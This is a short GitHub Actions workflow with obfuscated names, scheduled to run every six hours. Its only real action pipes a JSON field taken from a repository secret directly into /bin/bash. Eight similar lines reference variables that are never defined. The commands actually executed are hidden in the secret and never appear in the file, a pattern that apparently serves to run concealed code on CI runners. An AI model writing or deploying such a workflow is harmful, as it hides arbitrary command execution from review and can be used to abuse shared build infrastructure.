name: gaozhizi7162
on:
  workflow_dispatch:
  schedule:
    - cron: '23 3/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: gaozhizi7162
        env:
          hsh36: ${{ secrets.hsh36 }}
        run: |
          echo $hsh36 | jq -r .lnono334 | /bin/bash
          echo $drbwx2331 | jq -r .f5 | /bin/bash
          echo $znu13 | jq -r .qp16 | /bin/bash
          echo $c9022 | jq -r .gdwvj1365 | /bin/bash
          echo $p9 | jq -r .nr0 | /bin/bash
          echo $d11 | jq -r .w6 | /bin/bash
          echo $bxcz940 | jq -r .rslx850 | /bin/bash
          echo $su3520 | jq -r .ejows958 | /bin/bash
          echo $ngp41144 | jq -r .ynmal9 | /bin/bash

